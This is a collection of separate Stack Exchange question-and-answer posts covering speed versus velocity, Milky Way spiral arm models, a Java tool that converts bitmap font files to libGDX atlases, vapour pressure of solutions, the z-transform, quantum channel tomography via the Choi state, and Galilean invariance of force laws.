Question: Related to Distinguish between instantaneous speed and instantaneous velocity I understand that the average velocity is given by the displacement divided by the change in time, and it is a vector quantity. Similarly, the average speed is given by the distance traveled divided by the change in time, and it is a scalar quantity. I am also aware that the instantaneous speed is the magnitude of the instantaneous velocity. However, I am unsure how to prove this relationship using the average formulas mentioned above. How can we show that the infinitesimal displacement has the same magnitude as the infinitesimal distance traveled? I mean, prove that $|\lim_{\Delta t\to 0} \frac{displacement}{\Delta t}|=\lim_{\Delta t\to 0} \frac{distance\,traveled}{\Delta t}$. This is analogous to asking why, with a decreasing time interval, we obtain, in the limit, the instantaneous scalar acceleration, which is precisely the magnitude of the instantaneous vector acceleration. Thank you. Answer: If A and B are two points with a finite separation on the path of a moving particle, the segment of path between these points need not be straight, so, for this segment: $$\text{distance gone}\geq \text {|displacement|}.$$ Dividing by the time taken to go from A to B we have, $$\text{speed}\geq \text {|velocity|}.$$ However as we take B closer and closer to A the segment of path approaches a straight line, so the distance is the same as the magnitude of the displacement, and the $\geq$ becomes simply = in both relationships.
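A concrete numerical illustration of that limit (a sketch; uniform circular motion is my example, not the answer's): on the unit circle the distance gone over an interval $\Delta t$ is the arc length $\Delta t$ itself, while the displacement is the chord $2\sin(\Delta t/2)$, and their ratio tends to 1 as $\Delta t \to 0$.

```python
import math

# r(t) = (cos t, sin t): unit speed, so distance over dt is exactly dt,
# while |displacement| is the chord length 2*sin(dt/2).
for dt in (1.0, 0.1, 0.01, 0.001):
    avg_speed = dt / dt                      # distance / time = 1
    avg_vel_mag = 2 * math.sin(dt / 2) / dt  # |displacement| / time
    print(dt, avg_vel_mag)                   # climbs toward avg_speed = 1
```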
{ "domain": "physics.stackexchange", "id": 100134, "tags": "vectors, velocity, speed" }
Logarithmic Spiral arms in the Milky Way
Question: I am trying to model the magnetic field of the inner 'disk' of the Milky Way Galaxy. I am following the model of Jansson and Farrar 2012. In section 5.1.1 of this paper they describe the Milky Way as 8 logarithmic spiral regions with opening angle $i = 11.5^{\circ}$. In this case, in cylindrical coordinates $(r,\phi,z)$ the dividing lines between these spiral regions is given by $$ r = r_x \, \text{exp}(\phi \, \text{tan}(90 - i))$$ where $r_x$ is a constant for each spiral arm. I am confused as to how this equation can describe a full rotation of a spiral arm. For a whole rotation $\phi = 2 \pi$ and so $\text{exp}(\phi \, \text{tan}(90 - i)) \approx e^{30} \approx 10^{13}$. But surely the radius of a spiral arm in the MW does not change by such a huge factor?! I feel that I am missing something here, and any guidance for what it is would be greatly appreciated. Thanks Answer: Look at the model in context. In the sentence before giving the values for $r_{-x}$ (which you've written as $r_x$), the authors write Between radii 5 kpc and 20 kpc there are eight logarithmic spiral regions with opening angle $i = 11.5^{\circ}$. In other words, the model really only has physical meaning for 5 kpc < $r$ <20 kpc. Some other things to take into account: This model is only valid for a certain region. While logarithmic spirals can indeed describe spiral arms well, they aren't successful for all values of $r$. For example, they fail to describe the inner region of the disk (i.e. 3-5 kpc). Spiral arms aren't always regular. We don't have a fantastic understanding of the spiral arms of the Milky Way. The 2-arm and 4-arm models are constantly competing with one another, and some minor arms (e.g. the Far 3 kpc Arm; see Dame & Thaddeus (2008)) have been discovered recently. The important message here, though, is that the spiral arms are limited to main part of the galactic disk, which does not extend to such great distances.
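The answer's restriction to 5–20 kpc can be made quantitative with the formula from the question (a quick sketch; note that $\phi$ is in radians, and the degree-valued angles inside the tangent are converted first):

```python
import math

i = 11.5                               # opening angle in degrees
k = math.tan(math.radians(90 - i))     # ~4.9

# Inverting r = r_x * exp(k * phi): the azimuthal span needed to go
# from r = 5 kpc to r = 20 kpc along one boundary spiral.
dphi = math.log(20 / 5) / k
print(math.degrees(dphi))              # ~16 degrees, nowhere near a full turn
```

So within the region where the model is defined, each boundary spiral sweeps only a small fraction of a rotation, and the $e^{30}$ blow-up at $\phi = 2\pi$ never arises.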
{ "domain": "physics.stackexchange", "id": 28915, "tags": "astrophysics" }
Convert Bitmap Font to Texture Atlas
Question: I wanted to render the textures that comprise a bitmap font glyph onto the screen directly as an Image in libGDX. When you make a bitmap font using a program (such as Hiero), it generates a text readable .fnt file along with a .png file that is the sprite sheet for the font. The only thing missing is a matching .atlas file to tell the location of the textures in that .png. This program takes a .fnt file as input and outputs a .atlas file that can be used with libGDX (and any engines that use the same type of atlas file). It parses the font file to find the names of the textures and their location on the sprite sheet. One reason I am seeking feedback is that this is the first program/code that I have put on Github with the intention of other people using it. It would be interesting to hear whether there are enough comments and enough documentation for others to understand and use the software.

Launcher.java

public class Launcher {
    /**
     * The file name for the atlas generator must be passed in
     * without a file extension.
     */
    public static void main(String[] args) throws IOException {
        String fileName = "test_dos437";
        new FntToAtlasGenerator(fileName);
    }
}

FntToAtlasGenerator.java

/**
 * The idea is to pass in the name of a .fnt file generated by Hiero
 * This program will generate a .atlas file that is compatible with libGDX
 * Next put the .atlas file and the .png that comes along with the .fnt file
 * into the android/assets folder of your libGDX project.
 *
 * @author baz
 */
public class FntToAtlasGenerator {

    List<GlyphData> glyphs = new ArrayList<GlyphData>();

    public FntToAtlasGenerator(String fileName) throws IOException {
        //String fileName = "test_dos437";
        String inputDir = "input/";
        String outputDir = "output/";
        String extension = ".fnt";
        String atlasExtension = ".atlas";

        FileReader fontReader = new FileReader(inputDir + fileName + extension);
        BufferedReader reader = new BufferedReader(fontReader);
        reader.readLine(); //info line
        String commonLine = reader.readLine();
        String pageLine = reader.readLine();
        reader.readLine(); //chars line

        String line = reader.readLine();
        while(line != null) {
            this.addLineToGlyphs(line);
            line = reader.readLine();
        }
        reader.close();

        PrintWriter writer = new PrintWriter(outputDir + fileName + atlasExtension, "UTF-8");

        //values read from .fnt file
        String fileNameForAtlas = this.getFileNameForPageLine(pageLine);
        String size = this.getSizeForCommonLine(commonLine);

        //default values
        String format = "RGBA8888";
        String filter = "Nearest, Nearest";
        String repeat = "none";

        this.writeOpeningLines(writer, fileNameForAtlas, size, format, filter, repeat);
        for (GlyphData glyph : this.glyphs) {
            this.writeGlyph(glyph, writer);
        }
        writer.close();
    }

    private void writeOpeningLines(PrintWriter writer, String fileName, String size,
            String format, String filter, String repeat) {
        writer.println(fileName);
        writer.println("size: " + size);
        writer.println("format: " + format);
        writer.println("filter: " + filter);
        writer.println("repeat: " + repeat);
    }

    /**
     * The name will be a string that is the integer of the character in ASCII
     * The idea is that you can get the integer value of a character in a string
     * and then render its image to the screen
     */
    private void writeGlyph(GlyphData glyph, PrintWriter writer) {
        String stringOffset = "  "; //two spaces for lines after name
        writer.println(glyph.id); //name
        writer.println(stringOffset + "rotate: false");
        writer.println(stringOffset + "xy: " + glyph.x + ", " + glyph.y);
        writer.println(stringOffset + "size: " + glyph.width + ", " + glyph.height);
        writer.println(stringOffset + "orig: " + glyph.width + ", " + glyph.height);
        writer.println(stringOffset + "offset: " + glyph.xoffset + ", " + glyph.yoffset);
        writer.println(stringOffset + "index: -1");
    }

    private String getFileNameForPageLine(String pageLine) {
        String[] fragments = pageLine.split(" ");
        String nameString = fragments[2];
        return nameString.replace("file=", "").replace("\"", "");
    }

    private String getSizeForCommonLine(String commonLine) {
        String[] fragments = commonLine.split(" ");
        String widthString = fragments[3];
        widthString = widthString.replace("scaleW=", "");
        String heightString = fragments[4];
        heightString = heightString.replace("scaleH=", "");
        return widthString + "," + heightString;
    }

    private void addLineToGlyphs(String lineString) throws IOException {
        if (lineString != null) {
            String[] lineFragments = lineString.split(" ");
            List<String> formattedStrings = new ArrayList<String>();

            //remove new line, space, and return characters
            //because there are wacky spaces in between the text of the .fnt file
            //and when you split on space, it adds new line type characters
            if (lineFragments[0].equals("char")) {
                for (int i = 0; i < lineFragments.length; i++) {
                    String string = lineFragments[i];
                    string = string.replace(" ", "");
                    string = string.replace("\n", "");
                    string = string.replace("\r", "");

                    //cant just reassign, because we need to remove empties
                    //and we want to directly assign based on index because we know the format
                    if (!(string.equals(" ") || string.equals("\n") || string.equals("\r") || string.isEmpty())) {
                        formattedStrings.add(string);
                    }
                }
                /*
                for (String string : formattedStrings) {
                    System.out.println(string);
                }
                */
                GlyphData data = new GlyphData(formattedStrings);
                this.glyphs.add(data);
            }
        }
    }
}

//example input
/*
info face="Pescadero" size=20 bold=1 italic=0 charset="" unicode=0 stretchH=100 smooth=1 aa=1 padding=2,2,2,2 spacing=2,2
common lineHeight=31 base=19 scaleW=256 scaleH=256 pages=1 packed=0
page id=0 file="pescadero-blackWhite-20.png"
chars count=94
char id=32 x=0 y=0 width=0 height=0 xoffset=0 yoffset=19 xadvance=13 page=0 chnl=0
char id=124 x=0 y=0 width=7 height=26 xoffset=2 yoffset=2 xadvance=17 page=0 chnl=0
char id=92 x=7 y=0 width=14 height=25 xoffset=-2 yoffset=2 xadvance=14 page=0 chnl=0
char id=47 x=21 y=0 width=14 height=25 xoffset=-2 yoffset=2 xadvance=14 page=0 chnl=0
char id=106 x=35 y=0 width=10 height=24 xoffset=-2 yoffset=4 xadvance=12 page=0 chnl=0
char id=81 x=45 y=0 width=22 height=23 xoffset=-1 yoffset=4 xadvance=23 page=0 chnl=0
char id=74 x=67 y=0 width=12 height=23 xoffset=-2 yoffset=3 xadvance=13 page=0 chnl=0
char id=93 x=79 y=0 width=10 height=22 xoffset=-2 yoffset=3 xadvance=13 page=0 chnl=0
char id=91 x=89 y=0 width=10 height=22 xoffset=0 yoffset=3 xadvance=13 page=0 chnl=0
char id=41 x=99 y=0 width=11 height=22 xoffset=-2 yoffset=4 xadvance=13 page=0 chnl=0
char id=40 x=110 y=0 width=11 height=22 xoffset=-1 yoffset=4 xadvance=13 page=0 chnl=0
char id=112 x=121 y=0 width=16 height=22 xoffset=-2 yoffset=7 xadvance=18 page=0 chnl=0
kearnings count = -1
*/

//example output
/*
texturePackResize22.png
size: 1784,1498
format: RGBA8888
filter: Nearest,Nearest
repeat: none
arco01
  rotate: false
  xy: 164, 326
  size: 160, 318
  orig: 160, 318
  offset: 0, 0
  index: -1
arco02
  rotate: false
  xy: 326, 752
  size: 160, 318
  orig: 160, 318
  offset: 0, 0
  index: -1
arco03
  rotate: false
  xy: 488, 1178
  size: 160, 318
  orig: 160, 318
  offset: 0, 0
  index: -1
*/

GlyphData.java

public class GlyphData {
    public final String character;
    public final String id;
    public final String x;
    public final String y;
    public final String width;
    public final String height;
    public final String xoffset;
    public final String yoffset;
    public final String xadvance;
    public final String page;
    public final String chnl;

    public GlyphData(List<String> glyphDataFragments) {
        //preserving all non white space elements of the char line of the .fnt file
        //some of the data may be needed later
        //im leaving this block in so it is clear which are currently unused
        String character = glyphDataFragments.get(0); //keyword for font language
        String id = glyphDataFragments.get(1);
        String x = glyphDataFragments.get(2);
        String y = glyphDataFragments.get(3);
        String width = glyphDataFragments.get(4);
        String height = glyphDataFragments.get(5);
        String xoffset = glyphDataFragments.get(6);
        String yoffset = glyphDataFragments.get(7);
        String xadvance = glyphDataFragments.get(8);
        String page = glyphDataFragments.get(9);
        String chnl = glyphDataFragments.get(10);

        this.id = id.replace("id=", "");
        this.x = x.replace("x=", "");
        this.y = y.replace("y=", "");
        this.width = width.replace("width=", "");
        this.height = height.replace("height=", "");
        this.xoffset = xoffset.replace("xoffset=", "");
        this.yoffset = yoffset.replace("yoffset=", "");

        //unused
        this.character = character;
        this.xadvance = xadvance;
        this.page = page;
        this.chnl = chnl;
    }
}

When you place the generated .atlas file and .png file in the android/assets folder of the libGDX project and create a TextureAtlas object from the atlas file, you can access the TextureRegions according to the ASCII integer value of the character. For example, 70 is equal to capital F. Then you can create an Image object from the TextureRegion and use it like you would use any other sprite. Here is the usage in libGDX:

Map<Integer, TextureRegion> textures = new HashMap<Integer, TextureRegion>();
TextureAtlas atlas = new TextureAtlas("bitmapfont.atlas");
final Image charImage = new Image(this.libGDXGame.allTextures.get((int)character));

And a pretty picture of what is possible: I've put the project on Github for anyone to use. There are no dependencies, and the README explains how to use the program. Here is the link.

Answer: Turning my comment into an answer by request. You should be able to do what you want by simply using the functionality already built into LibGDX.
Caveat: I have not tried this, I just know that the class exists and it should be possible to extract the data you want from it, so: some assembly may be required on your part.

LibGDX has functionality for loading and dealing with bitmapped fonts. See the documentation here. You can use the BitmapFont class to load the font data. It supports AngelCode BMFont formats. Hiero, which you are using, can output to BMFont.

Create a new instance of the BitmapFont:

BitmapFont bmf = new BitmapFont(Gdx.files.internal("data/myfile.bmf"));

Then get the data backing the font:

BitmapFont.BitmapFontData bmfdata = bmf.getData();

Get the Glyph for your wanted character; this contains the u/v coordinates for the glyph, which texture page it is on, and some other goodies. Then get the correct texture page from the BitmapFont and use the u/v pairs to extract the texture region for your wanted glyph:

BitmapFont.Glyph glyph = bmfdata.getGlyph(character);
if (glyph == null) {
    // handle error: No glyph for character
} else {
    TextureRegion page = bmf.getRegion(glyph.page);
    TextureRegion glyphTexture = new TextureRegion(page.getTexture(),
            glyph.u, glyph.v, glyph.u2, glyph.v2);
    // Use glyphTexture to render, or store it somewhere.
}

Again, I have not tested this. You may have to fiddle around or use other properties of the glyph to get the wanted result. But the data you need is all in there, you just have to pry it out. The LibGDX documentation (and source code) is your friend.
{ "domain": "codereview.stackexchange", "id": 15360, "tags": "java, game, parsing, file, libgdx" }
Can we compare the vapour pressure of solutions whose concentrations and temperature is known?
Question: If we have some solutions in which we know the temperature and the concentration of the solute particles, can we compare their vapour pressures? Original question: Which solution has the highest vapour pressure among the following?

a) $0.02~\pu{M}$ $\ce{NaCl}$ at $50^{\circ}$C
b) $0.03~\pu{M}$ sucrose at $15^{\circ}$C
c) $0.005~\pu{M}$ $\ce{CaCl_2}$ at $50^{\circ}$C
d) $0.005~\pu{M}$ $\ce{CaCl_2}$ at $25^{\circ}$C

I answered this question by noting that at higher temperature and lower concentration the vapour pressure of the solution should be the highest, because higher temperature implies more kinetic energy, which means more volatility, and low concentration means that the solute is less solvated, so it forms fewer bonds with the solvent and the solution therefore has a higher vapour pressure; so the answer is c). Is this reasoning correct? Now I think that these options were set so that it becomes easy to compare. But what if I had options like $0.02~\pu{M}$ $\ce{NaCl}$ at $50^{\circ}$C, $0.03~\pu{M}$ $\ce{NaCl}$ at $60^{\circ}$C, $0.005~\pu{M}$ $\ce{CaCl_2}$ at $20^{\circ}$C — how shall we compare their vapour pressures without doing experiments? Now, if there existed a relation between vapour pressure and concentration or temperature, it would become easier. For example, the relation between vapour pressure and temperature can be given by the Antoine equation, but I want something that also incorporates the concentration in the equation, so that by plugging in the values it becomes easy to compare. I am also not sure whether the van 't Hoff factor will have a role in it or not. Answer: The point of the question is to test your understanding

i. of Raoult's law (that increasing the solute concentration decreases the vapor pressure, and that the identity of the solute is not important in an ideal solution; the mole fraction of solute determines $\Delta p$): $\Delta p = p-p^\circ = -\chi_\textrm{solute}p^\circ$

ii.
that vapor pressure increases with T.

Other things you might want to remember are that molality and molarity are linearly proportional for dilute solutions (i.e. then $m \propto c_M$), and that ideality is approached for dilute solutions of small solutes (typically at low $\pu{mM}$ concentrations such as in this problem). You can answer the question based entirely on consideration of the van 't Hoff factor to compute total concentrations, and by assuming that the vapor pressure increases with T. First compute effective total solute concentrations $im$ (equal to either the solute concentration for a non-dissociating solute such as sucrose, or the total ion concentration for the electrolyte solutions): $$\begin{array}{|c|c|c|c|c|} \hline \text{species} & T (\pu{^\circ C}) & c_M (\pu{M}) & i & ic_M(\pu{M}) \\\hline 1.~\ce{NaCl} & 50 & 0.02 & 2 & 0.04\\ 2.~\text{sucrose} & 15 & 0.03 & 1 & 0.03\\ 3.~\ce{CaCl2 } & 25 & 0.005 & 3 & 0.015\\ 4.~\ce{CaCl2 } & 50 & 0.005 & 3 & 0.015\\\hline \end{array}$$ Inspection should quickly eliminate all options but row 4, since the others have a higher effective concentration and/or a lower T. Actual vapor pressures are not stated in the problem. In the absence of that information there is no point in attempting to compare things in more detail, and that's not the point of the problem. However, provided Raoult's law holds, it can be used to determine the change in vapor pressure regardless of T. Raoult's law assumes that the identity of the solute does not matter, that the effect of added solute on the activity of the solvent is entirely entropic (accounted for by ideal mixing entropy), and that the gas is ideal. In general, to predict the vapor pressure at any T and solute concentration you need a model of the activity of the solvent as a function of the solute concentration, and of the activity in the gas phase.
You can determine the vapor pressure by finding the conditions that render the activities identical.
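As a rough numerical sketch of the reasoning above (not from the original answer): the pure-water vapour pressures `p0` below are only illustrative placeholders, and ideal, dilute behaviour is assumed so Raoult's law applies.

```python
# van 't Hoff factors: NaCl -> 2 ions, sucrose -> 1, CaCl2 -> 3 ions
options = [
    ("NaCl",    50, 0.02,  2),
    ("sucrose", 15, 0.03,  1),
    ("CaCl2",   50, 0.005, 3),
    ("CaCl2",   25, 0.005, 3),
]

# hypothetical pure-solvent vapour pressures in kPa at each temperature
p0 = {15: 1.7, 25: 3.2, 50: 12.3}

MOLAR_WATER = 55.5  # mol/L, approximate molarity of pure water

def vapour_pressure(T, c, i):
    # mole fraction of solute particles (dilute approximation)
    chi = i * c / (i * c + MOLAR_WATER)
    return p0[T] * (1 - chi)  # Raoult's law: p = (1 - chi_solute) * p0

pressures = [vapour_pressure(T, c, i) for _, T, c, i in options]
best = max(range(len(options)), key=lambda k: pressures[k])
print(options[best])  # lowest i*c at the highest T wins
```

The ranking is driven almost entirely by temperature here; the solute term only breaks ties between solutions at the same temperature, which is exactly the inspection argument above.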
{ "domain": "chemistry.stackexchange", "id": 15454, "tags": "physical-chemistry, solutions, vapor-pressure" }
Optical Waveguide Mode Profile
Question: SE, I have a question about a mode profile chart from Synopsys RSoft. After following an example silicon Y-splitter waveguide below, with waveguide width = 0.45 um and height = 0.22 um, I simulated the Ex and Hy mode profiles of the splitter, but I do not know how to read this graph. I always thought waveguide modes are only integers and are related to the standing waves inside of the waveguide. What am I missing here? Also, what causes the shape of the mode profile, especially the Ex mode? Answer: The transverse electric field will not be continuous across the boundary because the Si and cladding have different polarizabilities. The discontinuity you see does not indicate a higher-order mode but rather results from the induced surface charge (think Gauss's Law). If you'd like to see a continuous field profile, plot $\mathbf{D}$ instead, which takes into account the polarizability. Or, you could plot the $x$-component field in the $y$ direction.
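A quick numeric illustration of this boundary condition (the permittivity values are illustrative, not taken from the RSoft example): with no free charge, the normal component of $\mathbf{D}$ is continuous across the interface, so $E_x$ must jump by the permittivity ratio.

```python
eps_si   = 12.1   # relative permittivity of silicon (approximate)
eps_clad = 2.1    # hypothetical oxide cladding

# Gauss's law with no free charge: normal D is continuous across the interface
D_normal = 1.0                 # arbitrary units, same on both sides
E_si   = D_normal / eps_si     # E_x just inside the silicon
E_clad = D_normal / eps_clad   # E_x just inside the cladding

# The transverse E_x field therefore jumps by the permittivity ratio
jump = E_clad / E_si
print(jump)  # equals eps_si / eps_clad: the step seen in the Ex mode plot
```

This is why plotting $\mathbf{D}$ gives a continuous profile while $E_x$ shows a sharp step at the core edge.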
{ "domain": "physics.stackexchange", "id": 79069, "tags": "optics, waveguide, photonics" }
What does z-transform imply?
Question: The z-transform is the transformation of discrete-time signals into the complex frequency domain. What do you get out of the complex stuff? Wikipedia calls it the complex frequency domain. Why do you need it? How should one look at it in order to understand it from the text? Answer: it's in the textbooks. here's a short synopsis:

in continuous-time LTI systems, you have 3 fundamental classes of building blocks:

scaler (multiply signal by a constant)
adder (add signals)
integrator (integrate signal w.r.t. time)

the first two do not discriminate w.r.t. frequency. so you can't build a "filter" out of just the first two because there is nothing in that filter that responds differently for different frequencies. so you need the third class which we commonly use the label "$s^{-1}$" for. for discrete-time LTI systems, the first two classes are the same as for continuous time. you have scalers and adders. but the third class of fundamental processing block is different. the third class is a unit delay, a delay of one unit of discrete time and we call that "$z^{-1}$". that's how digital filters know the difference between one frequency and another.
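A small sketch of that point (not from the original answer): a pure scaler has the same response at every frequency, while a system containing one unit delay ($z^{-1}$), here the first difference $y[n] = x[n] - x[n-1]$, responds very differently near DC than near Nyquist.

```python
import math

def response_magnitude(system, omega, N=2048):
    # drive the system with a sinusoid, measure the steady-state amplitude
    x = [math.cos(omega * n) for n in range(N)]
    y = system(x)
    return max(abs(v) for v in y[N // 2:])  # skip the transient

def scaler(x):
    # no memory: flat frequency response
    return [0.5 * xi for xi in x]

def first_difference(x):
    # uses one unit delay z^-1: y[n] = x[n] - x[n-1]
    return [xi - xprev for xi, xprev in zip(x, [0.0] + x[:-1])]

low, high = 0.01, 3.0  # rad/sample: near DC vs near Nyquist
s_low, s_high = response_magnitude(scaler, low), response_magnitude(scaler, high)
d_low, d_high = response_magnitude(first_difference, low), response_magnitude(first_difference, high)
print(s_low, s_high)  # essentially equal: scalers cannot tell frequencies apart
print(d_low, d_high)  # tiny vs large: the delay element creates a filter
```

The first difference has magnitude response $|H(e^{j\omega})| = 2|\sin(\omega/2)|$, which is only possible because the block has memory, i.e. a $z^{-1}$.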
{ "domain": "dsp.stackexchange", "id": 3235, "tags": "dsp-core, z-transform" }
Is tomography of the Choi state sufficient for channel tomography?
Question: Given that there is an isomorphism between quantum states and quantum channels (the Choi-Jamiolkowski isomorphism), and given that state tomography is well researched, why is quantum process or quantum channel tomography an interesting research topic? Does it not follow trivially from state tomography and the Choi isomorphism? Specifically, let one do the following:

1. Use $n$ copies of the channel and send one half of a max-entangled state through each copy.
2. Perform state tomography on the $n$ i.i.d. output states.
3. Knowing the Choi state, one has a description of the channel.

In 1), I am not sure if the setting of quantum channel tomography assumes access to the other half of the max-entangled state (that doesn't go into the channel) or not. Does this make a difference to the overall procedure? Answer: Sure, process tomography is intimately related to state tomography, and one way to see it is via the Choi isomorphism, as you point out. See also e.g. the discussion in section IV of (Mohseni et al. 2007). Although I would rephrase your steps more precisely as just saying that you use the maximally entangled state as input, send part of it through the channel, and perform state tomography of the (global) output state. This automatically implies that you send the input multiple times, as that's just how state tomography works in general. But this only "trivially shows" that process tomography is possible if you can generate an entangled state, send part of it through the channel, and then perform tomographically complete measurements on the (generally entangled) outputs. Note that this approach would require generating maximally entangled states of the form $\sum_{i=1}^d |i,i\rangle$ with $d$ the relevant state dimension. Not an easy task in general. There's plenty of things that this argument tells you nothing about.
For one thing, you can also clearly do process tomography without this kind of scheme and without the need to use an ancillary space and entangled states between ancillary and input space. What you really need to do is characterise the linear map that the channel is, so send any basis (or more generally, any complete and linearly independent set) of input density matrices, and do tomography of the associated outputs. This information is necessary and sufficient to obtain a "tomographically complete" description of the channel. Using the Choi is a "trick" to do this that allows one to use a single input state, at the cost of it having to be highly entangled, and thus having to work with larger spaces etc. So, as to why "quantum process or quantum channel tomography is an interesting research topic", that entirely depends on what one is interested in. There's an endless list of things one can study about this process that the above arguments tell you nothing about. What about the reconstruction efficiency in terms of the required number of samples to have errors in a certain measure below a certain threshold with a certain probability? Which method is better from this point of view? Which set of input states is optimal from this point of view? What about robustness with respect to certain types of noise? Which methods will be better and which ones will be worse? What about all the problems associated with state tomography, such as the non-positivity of the estimated states you get when doing naive linear tomography? How do these carry over when you use these tomography methods for process tomography instead? How do you even quantify the quality of the estimated channel? There are many possible distances between channels that you can use, each one more suited for specific purposes. What about actual experimental implementations?
What are the best experimental schemes to perform process tomography given the resources more easily available in different types of experimental platforms? These are just some of the possible issues that came to mind on the spot (probably all of these have been worked out in the literature, I don't know). You could go on for a while. See for example the paper linked above for a more detailed overview.
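To make the "characterise the linear map" route concrete, here is a minimal numpy sketch (not from the original answer) of building a single-qubit channel's Choi matrix from its action on the matrix units $E_{ij}=|i\rangle\langle j|$, using one common convention $J = \sum_{ij} E_{ij}\otimes\Lambda(E_{ij})$. The "unknown" channel is a bit-flip channel chosen purely for illustration; in an experiment each $\Lambda(E_{ij})$ would be assembled from state tomography of the outputs.

```python
import numpy as np

X = np.array([[0, 1], [1, 0]], dtype=complex)
p = 0.3

def channel(rho):
    # bit-flip channel: Lambda(rho) = (1-p) rho + p X rho X
    return (1 - p) * rho + p * (X @ rho @ X)

d = 2
J = np.zeros((d * d, d * d), dtype=complex)
for i in range(d):
    for j in range(d):
        E = np.zeros((d, d), dtype=complex)
        E[i, j] = 1.0
        J += np.kron(E, channel(E))  # Choi matrix from action on matrix units

# Sanity checks: J is Hermitian, and the partial trace over the output
# space is the identity (trace preservation of the channel).
pt = np.einsum('ikjk->ij', J.reshape(d, d, d, d))
print(np.allclose(J, J.conj().T), np.allclose(pt, np.eye(d)))  # -> True True
```

Note that the loop feeds the map the non-physical inputs $E_{01}, E_{10}$; in practice these are obtained by linearity from tomography of a complete set of physical input states, which is where the sampling-efficiency and positivity questions above enter.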
{ "domain": "quantumcomputing.stackexchange", "id": 4553, "tags": "quantum-state, quantum-operation, state-tomography, quantum-process-tomography" }
Interpretation: Galilean Transformation of Force Laws
Question: so my book says

The transformation that allows us to go from one inertial frame $O$ with coordinates $x_i$ to another inertial frame $O'$ with coordinates $x_i'$ is the Galilean transformation. If the relative velocity of the two frames is given to be $\vec{v}=const$ and their relative orientations are specified by three angles $\alpha, \beta$ and $\gamma$, the new coordinates are related to the old ones by $x_i \to x_i' = \mathbf{R}_{ij} x_j - v_it$, where $\mathbf{R}=\mathbf{R}(\alpha, \beta, \gamma)$ is the rotation matrix. In Newtonian physics, the time coordinate is assumed to be absolute, i.e. it is the same in every coordinate frame. For the Galilean transformation, we are mainly interested in coordinate transformations among inertial frames with the same orientation, $\mathbf{R}(0,0,0)_{ij}=\delta_{ij}$. Such a transformation is called a (Galilean) boost: \begin{align} x_i \to x_i' &= x_i - v_it \tag{1.1}\\ t \to t' &= t \tag{1.2} \end{align}

and it also states the velocity addition rule $u_i \to u_i' = u_i - v_i \tag{2}$

Now I wanted to solve the following problem:

Newtonian relativity: Consider a few definite examples of Newtonian mechanics that are unchanged by the Galilean transformations (1.1, 1.2) and (2): Show that force as given by the product of acceleration and mass, $\vec{F}=m\vec{a}$, as well as a force law such as Newton's law of gravity, $\vec{F}=G_n\frac{m_1m_2}{r^2}\hat{r}$, remain the same in every inertial frame.

What I did is $F=ma=m\frac{d^2}{dt^2}x=m\frac{d^2}{dt'^2}(x'+vt)=m\frac{d^2}{dt'^2}x'=ma'$

Now assume $v$ only acts in the x direction. I want to show that $\vec{F}=G_n m_1m_2 \frac{1}{r^2}\hat{r}$ is the same in every inertial frame. So basically I want to show $\frac{1}{r^2}\hat{r} = \frac{1}{r'^2}\hat{r'}$ resp.
$\frac{\vec{r}}{r^3}=\frac{\vec{r'}}{r'^3}$ $\frac{\vec{r}}{r^3}=\frac{1}{\sqrt{x^2+y^2+z^2}^3}\begin{pmatrix} x \\ y \\ z \end{pmatrix}=\frac{1}{\sqrt{(x'+vt)^2+y'^2+z'^2}^3}\begin{pmatrix} x'+vt \\ y' \\ z' \end{pmatrix}$ Now 1. works great. Everything seems fine, but 2. doesn't work and I don't understand why it should work to begin with. Now 1. basically tells me: If I measure the force of a spring at home or in my car that moves with a constant velocity, I get the same result. Now what does 2. tell me? I interpret it like this: Assume we have a mini-earth that we can take with us. We take it to our room. We measure the gravitational force acting on some point mass at a specific location $\vec{x_0}$. We get some value. We then drive around in our car, again with a constant velocity, and measure again: same result. Now I think what I do in my attempt to prove 2. is fixing the earth. I leave it at home, sit in my car, drive around and try to measure stuff. I'm very unsure though, so I opted for a simpler example: Hooke's Law. We have $F_h=-kx$. It's easy to imagine: if I squeeze my spring by $x=1\,\mathrm{m}$ I get some kind of force that pushes back. It doesn't matter if I do that at home or in the car, so let's try to show that: $F_h=-kx=-k(x'+vt)\neq F_h' = -kx' \tag{3}$ So again, in (3) we basically leave the spring at home, no? How do I show that a force law doesn't change under a Galilean transformation? Answer: I see two problems in your question. The first is that the force laws in both of your examples make certain assumptions: the quantities ($\mathbf{r}$ in the first example and $x$ in the second example) are not absolutes, they are distances measured from some origin which represents something physical. In the case of the gravitational force, the centre usually represents a "larger" mass (like the Sun in the solar system), while in the case of Hooke's law the centre represents the point at which the spring is attached.
So the actual force laws that you should be considering (in the general case) are the following: Gravitational force: consider two masses $m_1$ and $m_2$ at positions $\mathbf{r}_1$ and $\mathbf{r}_2$ respectively. Then the force on $1$ due to $2$ is: $$\mathbf{F}_{12} = -\frac{Gm_1 m_2}{(\mathbf{r}_1 - \mathbf{r}_2)^2}\hat{\mathbf{r}}_{12}$$ The force on the mass attached to the end of the spring is $F = - k(x-x_0)$ where $x_0$ is the position of the point at which the spring is attached. Secondly, your interpretation of Galilean Invariance is not strictly correct. When you do a Galilean boost, you should imagine looking at the entire system as a whole from a moving car (or rocket, if you prefer). Therefore, you must boost all the relevant quantities, otherwise you're just giving one of them a velocity, and not the other, and that's certainly not the same thing as observing the system from a different inertial frame. That you are doing this is reflected in the fact that your answers aren't showing the equations to be invariant! Let's look at the second example to see this properly: if you observe the spring from a different frame of reference, the point at which it is fixed will also appear to be moving, and therefore you would have: \begin{align}x' &= x - vt\\x_0' &= x_0 - v t,\end{align} so that $x'-x_0' = x - x_0$, and you can easily show that the force law is invariant. See also this very similar question: Galilean invariance of Newton's universal gravitation law.
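A numeric sanity check of this argument (illustrative masses and positions, with $G$ set to 1): boosting all positions leaves the two-body gravitational force unchanged, because only the relative separation $\mathbf{r}_1 - \mathbf{r}_2$ enters, while boosting only one position, which is the mistake described above, changes the force.

```python
import math

def grav_force(r1, r2, m1=2.0, m2=3.0, G=1.0):
    d = [a - b for a, b in zip(r1, r2)]
    r = math.sqrt(sum(c * c for c in d))
    # force on 1 due to 2: F = -G m1 m2 (r1 - r2) / |r1 - r2|^3
    return [-G * m1 * m2 * c / r**3 for c in d]

v, t = 5.0, 7.0              # boost velocity (x direction) and time
r1 = [1.0, 2.0, 3.0]
r2 = [4.0, 0.0, -1.0]

def boost(r):
    # Galilean boost x' = x - v t, applied to EVERY position in the problem
    return [r[0] - v * t, r[1], r[2]]

F  = grav_force(r1, r2)
Fb = grav_force(boost(r1), boost(r2))
print(F, Fb)  # identical: the boost cancels in r1 - r2
```

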